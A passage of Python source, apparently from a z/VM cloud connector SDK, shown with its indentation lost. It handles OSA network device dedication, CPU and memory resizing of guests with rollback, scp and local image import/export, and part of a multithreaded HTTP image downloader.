raise exception.SDKSMTRequestFailed(err.results, msg)
with zvmutils.expect_invalid_resp_data():
idx_end = len(rd_list)
idx = 0
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
return idx + offset, value
# Start to analyse the osa devices info
while((idx < idx_end) and
rd_list[idx].__contains__('OSA Address')):
idx, osa_addr = _parse_value(rd_list, idx,
'OSA Address: ')
idx, osa_status = _parse_value(rd_list, idx,
'OSA Status: ')
idx, osa_type = _parse_value(rd_list, idx,
'OSA Type: ')
if osa_type != 'UNKNOWN':
idx, CHPID_addr = _parse_value(rd_list, idx,
'CHPID Address: ')
idx, Agent_status = _parse_value(rd_list, idx,
'Agent Status: ')
if osa_type not in OSA_info.keys():
OSA_info[osa_type] = {}
OSA_info[osa_type]['FREE'] = []
OSA_info[osa_type]['BOXED'] = []
OSA_info[osa_type]['OFFLINE'] = []
OSA_info[osa_type]['ATTACHED'] = []
if osa_status.__contains__('ATT'):
id = osa_status.split()[1]
item = (id, osa_addr)
OSA_info[osa_type]['ATTACHED'].append(item)
else:
OSA_info[osa_type][osa_status].append(osa_addr)
return OSA_info
def _get_available_vdev(self, userid, vdev=None):
ports_info = self._NetDbOperator.switch_select_table()
vdev_info = []
for p in ports_info:
if p['userid'] == userid.upper():
vdev_info.append(p['interface'])
if len(vdev_info) == 0:
# no nic defined for the guest
if vdev is None:
nic_vdev = CONF.zvm.default_nic_vdev
else:
nic_vdev = vdev
else:
if vdev is None:
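                # Each NIC occupies three consecutive vdevs, so the next
                # free vdev starts 3 above the highest one already in use.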
used_vdev = max(vdev_info)
nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:]
else:
if self._is_vdev_valid(vdev, vdev_info):
nic_vdev = vdev
else:
errmsg = ("The specified virtual device number %s "
"has already been used." % vdev)
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
if ((len(nic_vdev) > 4) or
(len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)):
errmsg = ("Virtual device number %s is not valid" % nic_vdev)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return nic_vdev
def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
if not self._is_OSA_free(OSA_device):
errmsg = ("The specified OSA device number %s "
"is not free" % OSA_device)
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'dedicated OSA device is %(osa)s',
{'vdev': nic_vdev,
'osa': OSA_device})
self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active)
return nic_vdev
def _dedicate_OSA_inactive_exception(self, error, userid, vdev,
OSA_device):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA_active_exception(self, error, userid, OSA_device):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 8)) or
((error.results['rc'] == 204) and (error.results['rs'] == 16))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA(self, userid, OSA_device, vdev, active=False):
if active:
self._is_active(userid)
msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def_vdev = vdev
att_OSA_device = OSA_device
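        # Dedicate three consecutive device addresses (the OSA triplet) to
        # the guest's user directory, one Image_Device_Dedicate_DM call each.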
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user %s "
"in the guest's user direct, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for user"
" %s in the guest's user direct, "
"error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
self._dedicate_OSA_inactive_exception(err, userid, vdev,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
if active:
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user "
"%s on the active guest system, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct and active
detach_vdev = vdev
for j in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % detach_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s in the guest's user "
"direct, error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:]
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err3:
if ((err3.results['rc'] == 204) and
(err3.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s on the active guest "
"system, error: %s" %
(def_vdev, userid,
err3.format_message()))
pass
self._dedicate_OSA_active_exception(err, userid,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
OSA_desc = 'OSA=%s' % OSA_device
self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc)
msg = ('Dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s successfully'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def _undedicate_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 44)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=16,
userid=userid, vdev=vdev,
msg=errmsg)
else:
raise error
def _undedicate_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=17,
userid=userid, vdev=vdev,
obj=obj_desc)
else:
raise error
def _undedicate_nic(self, userid, vdev, active=False,
del_active_only=False):
if active:
self._is_active(userid)
msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if not del_active_only:
def_vdev = vdev
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_inactive_exception(err, userid, vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
def_vdev = vdev
for i in range(3):
rd = ' '.join((
"SMAPI %s API Image_Device_Undedicate" %
userid,
"--operands",
'-v %s' % def_vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_active_exception(err, userid,
vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _request_with_error_ignored(self, rd):
"""Send smt request, log and ignore any errors."""
try:
return self._request(rd)
except Exception as err:
# log as warning and ignore namelist operation failures
LOG.warning(six.text_type(err))
def namelist_add(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Add " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_remove(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_query(self, namelist):
rd = "SMAPI %s API Name_List_Query" % namelist
resp = self._request_with_error_ignored(rd)
if resp is not None:
return resp['response']
else:
return []
def namelist_destroy(self, namelist):
rd = "SMAPI %s API Name_List_Destroy" % namelist
self._request_with_error_ignored(rd)
def _get_defined_cpu_addrs(self, userid):
user_direct = self.get_user_direct(userid)
defined_addrs = []
max_cpus = 0
for ent in user_direct:
if ent.startswith("CPU"):
cpu_addr = ent.split()[1].strip().upper()
defined_addrs.append(cpu_addr)
if ent.startswith("MACHINE ESA"):
max_cpus = int(ent.split()[2].strip())
return (max_cpus, defined_addrs)
def _get_available_cpu_addrs(self, used_addrs, max_cpus):
# Get available CPU addresses that are not defined in user entry
used_set = set(used_addrs)
available_addrs = set([hex(i)[2:].rjust(2, '0').upper()
for i in range(0, max_cpus)])
available_addrs.difference_update(used_set)
return list(available_addrs)
def _get_active_cpu_addrs(self, userid):
# Get the active cpu addrs in two-digit hex string in upper case
# Sample output for 'lscpu --parse=ADDRESS':
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # Address
# 0
# 1
active_addrs = []
active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS")
for c in active_cpus:
# Skip the comment lines at beginning
if c.startswith("# "):
continue
addr = hex(int(c.strip()))[2:].rjust(2, '0').upper()
active_addrs.append(addr)
return active_addrs
def resize_cpus(self, userid, count):
# Check defined cpus in user entry. If greater than requested, then
# delete cpus. Otherwise, add new cpus.
# Return value: for revert usage, a tuple of
# action: The action taken for this resize, possible values:
# 0: no action, 1: add cpu, 2: delete cpu
# cpu_addrs: list of influenced cpu addrs
action = 0
updated_addrs = []
(max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid)
defined_count = len(defined_addrs)
# Check maximum cpu count defined
if max_cpus == 0:
LOG.error("Resize for guest '%s' cann't be done. The maximum "
"number of cpus is not defined in user directory." %
userid)
raise exception.SDKConflictError(modID='guest', rs=3,
userid=userid)
# Check requested count is less than the maximum cpus
if count > max_cpus:
LOG.error("Resize for guest '%s' cann't be done. The "
"requested number of cpus: '%i' exceeds the maximum "
"number of cpus allowed: '%i'." %
(userid, count, max_cpus))
raise exception.SDKConflictError(modID='guest', rs=4,
userid=userid,
req=count, max=max_cpus)
# Check count and take action
if defined_count == count:
LOG.info("The number of current defined CPUs in user '%s' equals "
"to requested count: %i, no action for static resize"
"needed." % (userid, count))
return (action, updated_addrs, max_cpus)
elif defined_count < count:
action = 1
# add more CPUs
available_addrs = self._get_available_cpu_addrs(defined_addrs,
max_cpus)
# sort the list and get the first few addrs to use
available_addrs.sort()
# Define new cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid,
"--operands"))
updated_addrs = available_addrs[0:count - defined_count]
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Define new cpus in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("New CPUs defined in user directory for '%s' "
"successfully" % userid)
return (action, updated_addrs, max_cpus)
else:
action = 2
# Delete CPUs
defined_addrs.sort()
updated_addrs = defined_addrs[-(defined_count - count):]
# Delete the last few cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM " % userid,
"--operands"))
for addr in updated_addrs:
rd += (" -k CPU=CPUADDR=%s" % addr)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
msg = ("Delete CPUs in user directory for '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=6, userid=userid,
err=e.format_message())
LOG.info("CPUs '%s' deleted from user directory for '%s' "
"successfully" % (str(updated_addrs), userid))
return (action, updated_addrs, max_cpus)
def live_resize_cpus(self, userid, count):
# Get active cpu count and compare with requested count
# If request count is smaller than the current count, then report
# error and exit immediately.
active_addrs = self._get_active_cpu_addrs(userid)
active_count = len(active_addrs)
if active_count > count:
LOG.error("Failed to live resize cpus of guest: %(uid)s, "
"current active cpu count: %(cur)i is greater than "
"the requested count: %(req)i." %
{'uid': userid, 'cur': active_count,
'req': count})
raise exception.SDKConflictError(modID='guest', rs=2,
userid=userid,
active=active_count,
req=count)
# Static resize CPUs. (add or delete CPUs from user directory)
(action, updated_addrs, max_cpus) = self.resize_cpus(userid, count)
if active_count == count:
# active count equals to requested
LOG.info("Current active cpu count of guest: '%s' equals to the "
"requested count: '%i', no more actions needed for "
"live resize." % (userid, count))
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
return
else:
# Get the number of cpus to add to active and check address
active_free = self._get_available_cpu_addrs(active_addrs,
max_cpus)
active_free.sort()
active_new = active_free[0:count - active_count]
# Do live resize
# Define new cpus
cmd_str = "vmcp def cpu " + ' '.join(active_new)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Define cpu of guest: '%s' to active failed with . "
"error: %s." % (userid, err1.format_message()))
# Start to do rollback
if action == 0:
LOG.error(msg1)
else:
LOG.error(msg1 + (" Will revert the user directory "
"change."))
# Combine influenced cpu addrs
cpu_entries = ""
for addr in updated_addrs:
cpu_entries += (" -k CPU=CPUADDR=%s" % addr)
rd = ''
if action == 1:
# Delete added CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Delete_DM"
% userid, " --operands"))
else:
# Add deleted CPUs
rd = ''.join(("SMAPI %s API Image_Definition_Create_DM"
% userid, " --operands"))
rd += cpu_entries
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
msg = ("Failed to revert user directory change for '"
"%s', SMT error: %s" % (userid,
err2.format_message()))
LOG.error(msg)
else:
LOG.info("Revert user directory change for '%s' "
"successfully." % userid)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
# Activate successfully, rescan in Linux layer to hot-plug new cpus
LOG.info("Added new CPUs to active configuration of guest '%s'" %
userid)
try:
self.execute_cmd(userid, "chcpu -r")
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Rescan cpus to hot-plug new defined cpus for guest: "
"'%s' failed with error: %s. No rollback is done and you"
"may need to check the status and restart the guest to "
"make the defined cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=8, userid=userid,
err=msg)
uname_out = self.execute_cmd(userid, "uname -a")
if uname_out and len(uname_out) >= 1:
distro = uname_out[0]
else:
distro = ''
if 'ubuntu' in distro or 'Ubuntu' in distro \
or 'UBUNTU' in distro:
try:
# need use chcpu -e <cpu-list> to make cpu online for Ubuntu
online_cmd = "chcpu -e " + ','.join(active_new)
self.execute_cmd(userid, online_cmd)
except exception.SDKSMTRequestFailed as err:
msg = err.format_message()
LOG.error("Enable cpus for guest: '%s' failed with error: %s. "
"No rollback is done and you may need to check the "
"status and restart the guest to make the defined "
"cpus online." % (userid, msg))
raise exception.SDKGuestOperationError(rs=15, userid=userid,
err=msg)
LOG.info("Live resize cpus for guest: '%s' finished successfully."
% userid)
def _get_defined_memory(self, userid):
user_direct = self.get_user_direct(userid)
defined_mem = max_mem = reserved_mem = -1
for ent in user_direct:
# u'USER userid password storage max privclass'
if ent.startswith("USER "):
fields = ent.split(' ')
if len(fields) != 6:
# This case should not exist if the target user
# is created by zcc and not updated manually by user
break
defined_mem = int(zvmutils.convert_to_mb(fields[3]))
max_mem = int(zvmutils.convert_to_mb(fields[4]))
# For legacy guests, the reserved memory may not be defined
if ent.startswith("COMMAND DEF STOR RESERVED"):
reserved_mem = int(zvmutils.convert_to_mb(ent.split(' ')[4]))
return (defined_mem, max_mem, reserved_mem, user_direct)
def _replace_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
entry_str = ""
if isinstance(user_entry, list):
for ent in user_entry:
if ent == "":
# skip empty line
continue
else:
entry_str += (ent + '\n')
else:
entry_str = user_entry
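        # Write the entry to a temporary file and replace the user directory
        # via Image_Replace_DM; on failure, try to unlock the directory before
        # re-raising the original error.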
tmp_folder = tempfile.mkdtemp()
tmp_user_direct = os.path.join(tmp_folder, userid)
with open(tmp_user_direct, 'w') as f:
f.write(entry_str)
rd = ''.join(("SMAPI %s API Image_Replace_DM " % userid,
"--operands ",
"-f %s" % tmp_user_direct))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err1:
msg = ("Replace definition of guest '%s' failed with "
"SMT error: %s." % (userid, err1.format_message()))
LOG.error(msg)
LOG.debug("Unlocking the user directory.")
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
else:
LOG.debug("Guest '%s' unlocked successfully." % userid)
# at the end, raise the replace error for upper layer to handle
raise err1
finally:
self._pathutils.clean_temp_folder(tmp_folder)
def _lock_user_direct(self, userid):
rd = ("SMAPI %s API Image_Lock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
# ignore the "already locked" error
if ((e.results['rc'] == 400) and (e.results['rs'] == 12)):
LOG.debug("Image is already unlocked.")
else:
msg = ("Lock definition of guest '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise e
def resize_memory(self, userid, memory):
# Check defined storage in user entry.
# Update STORAGE and RESERVED accordingly.
size = int(zvmutils.convert_to_mb(memory))
(defined_mem, max_mem, reserved_mem,
user_direct) = self._get_defined_memory(userid)
# Check max memory is properly defined
if max_mem == -1 or reserved_mem == -1:
LOG.error("Memory resize for guest '%s' cann't be done."
"Failed to get the defined/max/reserved memory size "
"from user directory." % userid)
raise exception.SDKConflictError(modID='guest', rs=19,
userid=userid)
action = 0
# Make sure requested size is less than the maximum memory size
if size > max_mem:
LOG.error("Memory resize for guest '%s' cann't be done. The "
"requested memory size: '%im' exceeds the maximum "
"size allowed: '%im'." %
(userid, size, max_mem))
raise exception.SDKConflictError(modID='guest', rs=20,
userid=userid,
req=size, max=max_mem)
# check if already satisfy request
if defined_mem == size:
LOG.info("The current defined memory size in user '%s' equals "
"to requested size: %im, no action for memory resize "
"needed." % (userid, size))
return (action, defined_mem, max_mem, user_direct)
else:
# set action to 1 to represent that revert need to be done when
# live resize failed.
action = 1
# get the new reserved memory size
new_reserved = max_mem - size
# get maximum reserved memory value
MAX_STOR_RESERVED = int(zvmutils.convert_to_mb(
CONF.zvm.user_default_max_reserved_memory))
            # when the new reserved memory value > MAX_STOR_RESERVED,
            # cap it at the MAX_STOR_RESERVED value
if new_reserved > MAX_STOR_RESERVED:
new_reserved = MAX_STOR_RESERVED
# prepare the new user entry content
entry_str = ""
for ent in user_direct:
if ent == '':
# Avoid adding an empty line in the entry file
# otherwise Image_Replace_DM would return syntax error.
continue
new_ent = ""
if ent.startswith("USER "):
fields = ent.split(' ')
for i in range(len(fields)):
# update fields[3] to new defined size
if i != 3:
new_ent += (fields[i] + ' ')
else:
new_ent += (str(size) + 'M ')
# remove the last space
new_ent = new_ent.strip()
elif ent.startswith("COMMAND DEF STOR RESERVED"):
new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved)
else:
new_ent = ent
# append this new entry
entry_str += (new_ent + '\n')
# Lock and replace user definition with the new_entry content
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
LOG.debug("User directory Locked successfully for guest '%s' " %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, entry_str)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
# Finally return useful info
return (action, defined_mem, max_mem, user_direct)
def _revert_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed:
# print revert error and return
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory Locked successfully for guest '%s'." %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, user_entry)
except exception.SDKSMTRequestFailed:
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory reverted successfully for guest '%s'." %
userid)
def _get_active_memory(self, userid):
# Return an integer value representing the active memory size in mb
output = self.execute_cmd(userid, "lsmem")
active_mem = 0
for e in output:
# cmd output contains line starts with "Total online memory",
# its format can be like:
# "Total online memory : 8192 MB"
# or
# "Total online memory: 8G"
# need handle both formats
if e.startswith("Total online memory"):
try:
# sample mem_info_str: "8192MB" or "8G"
mem_info_str = e.split(':')[1].replace(' ', '').upper()
# make mem_info as "8192M" or "8G"
if mem_info_str.endswith('B'):
mem_info = mem_info_str[:-1]
else:
mem_info = mem_info_str
active_mem = int(zvmutils.convert_to_mb(mem_info))
except (IndexError, ValueError, KeyError, TypeError) as e:
errmsg = ("Failed to get active storage size for guest: %s"
% userid)
LOG.error(errmsg + " with error: " + six.text_type(e))
raise exception.SDKInternalError(msg=errmsg)
break
return active_mem
def live_resize_memory(self, userid, memory):
# Get active memory size and compare with requested size
# If request size is smaller than the current size, then report
# error and exit immediately.
size = int(zvmutils.convert_to_mb(memory))
active_size = self._get_active_memory(userid)
if active_size > size:
LOG.error("Failed to live resize memory of guest: %(uid)s, "
"current active memory size: %(cur)im is greater than "
"the requested size: %(req)im." %
{'uid': userid, 'cur': active_size,
'req': size})
raise exception.SDKConflictError(modID='guest', rs=18,
userid=userid,
active=active_size,
req=size)
# get maximum reserved memory value
MAX_STOR_RESERVED = int(zvmutils.convert_to_mb(
CONF.zvm.user_default_max_reserved_memory))
# The maximum increased memory size in one live resizing can't
# exceed MAX_STOR_RESERVED
increase_size = size - active_size
if increase_size > MAX_STOR_RESERVED:
LOG.error("Live memory resize for guest '%s' cann't be done. "
"The memory size to be increased: '%im' is greater "
" than the maximum reserved memory size: '%im'." %
(userid, increase_size, MAX_STOR_RESERVED))
raise exception.SDKConflictError(modID='guest', rs=21,
userid=userid,
inc=increase_size,
max=MAX_STOR_RESERVED)
# Static resize memory. (increase/decrease memory from user directory)
(action, defined_mem, max_mem,
user_direct) = self.resize_memory(userid, memory)
# Compare active size and requested size, then update accordingly
if active_size == size:
# online memory already satisfied
LOG.info("Current active memory size of guest: '%s' equals to the "
"requested size: '%iM', no more actions needed for "
"live resize." % (userid, size))
LOG.info("Live resize memory for guest: '%s' finished "
"successfully." % userid)
return
else:
# Do live resize. update memory size
# Step1: Define new standby storage
cmd_str = ("vmcp def storage standby %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as e:
# rollback and return
msg = ("Define standby memory of guest: '%s' failed with "
"error: %s." % (userid, e.format_message()))
LOG.error(msg)
# Start to do rollback
if action == 1:
LOG.debug("Start to revert user definition of guest '%s'."
% userid)
self._revert_user_direct(userid, user_direct)
# Finally, raise the error and exit
raise exception.SDKGuestOperationError(rs=11,
userid=userid,
err=e.format_message())
# Step 2: Online new memory
cmd_str = ("chmem -e %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Online memory of guest: '%s' failed with "
"error: %s." % (userid, err1.format_message()))
LOG.error(msg1)
# Start to do rollback
LOG.info("Start to do revert.")
LOG.debug("Reverting the standby memory.")
try:
self.execute_cmd(userid, "vmcp def storage standby 0M")
except exception.SDKSMTRequestFailed as err2:
# print revert error info and continue
msg2 = ("Revert standby memory of guest: '%s' failed with "
"error: %s." % (userid, err2.format_message()))
LOG.error(msg2)
# Continue to do the user directory change.
if action == 1:
LOG.debug("Reverting the user directory change of guest "
"'%s'." % userid)
self._revert_user_direct(userid, user_direct)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
LOG.info("Live resize memory for guest: '%s' finished successfully."
% userid)
def is_rhcos(self, os_version):
return os_version.lower().startswith('rhcos')
def _get_wwpn_lun(self, userid):
user_direct = self.get_user_direct(userid)
wwpn = None
lun = None
for ent in user_direct:
if ent.upper().startswith("LOADDEV PORT"):
wwpn = ent.split()[2].strip()
elif ent.upper().startswith("LOADDEV LUN"):
lun = ent.split()[2].strip()
return (wwpn, lun)
class FilesystemBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
"""Import image from remote host to local image repository using scp.
        If remote_host is not specified, the source file exists in the local
        file system, so just copy the image to the image repository.
"""
source = urlparse.urlparse(url).path
if kwargs['remote_host']:
if '@' in kwargs['remote_host']:
source_path = ':'.join([kwargs['remote_host'], source])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Copying image file from remote filesystem failed"
" with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=10, err=output)
else:
msg = ("The specified remote_host %s format invalid" %
kwargs['remote_host'])
LOG.error(msg)
raise exception.SDKImageOperationError(rs=11,
rh=kwargs['remote_host'])
else:
LOG.debug("Remote_host not specified, will copy from local")
try:
shutil.copyfile(source, target)
except Exception as err:
msg = ("Import image from local file system failed"
" with reason %s" % six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=12,
err=six.text_type(err))
@classmethod
def image_export(cls, source_path, dest_url, **kwargs):
"""Export the specific image to remote host or local file system """
dest_path = urlparse.urlparse(dest_url).path
if kwargs['remote_host']:
target_path = ':'.join([kwargs['remote_host'], dest_path])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target_path])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when copying image file to remote "
"host with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=21, msg=output)
else:
# Copy to local file system
LOG.debug("Remote_host not specified, will copy to local server")
try:
shutil.copyfile(source_path, dest_path)
except Exception as err:
msg = ("Export image from %(src)s to local file system"
" %(dest)s failed: %(err)s" %
{'src': source_path,
'dest': dest_path,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=22,
err=six.text_type(err))
class HTTPBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
import_image = MultiThreadDownloader(image_name, url,
target)
import_image.run()
class MultiThreadDownloader(threading.Thread):
def __init__(self, image_name, url, target):
super(MultiThreadDownloader, self).__init__()
self.url = url
# Set thread number
self.threadnum = 8
r = requests.head(self.url)
# Get the size of the download resource
self.totalsize = int(r.headers['Content-Length'])
self.target = target
def handle_download_errors(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as err:
self.fd.close()
msg = ("Download image from http server failed: %s" %
six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=9,
err=six.text_type(err))
return wrapper
def get_range(self):
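        # Split the total size into one byte range per thread; the last range
        # is left open-ended so it also covers any remainder bytes.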
ranges = []
offset = int(self.totalsize / self.threadnum)
for i in range(self.threadnum):
if i == self.threadnum - 1:
ranges.append((i * offset, ''))
else:
# Get the process range for each thread
ranges.append((i * offset, (i + 1) * offset))
return ranges
def download(self, start, end):
headers = {'Range': 'Bytes=%s-%s' % (start, end),
'Accept-Encoding': '*'}
# Get the data
res = requests.get(self.url, headers=headers)
# seek to the right position for writing data
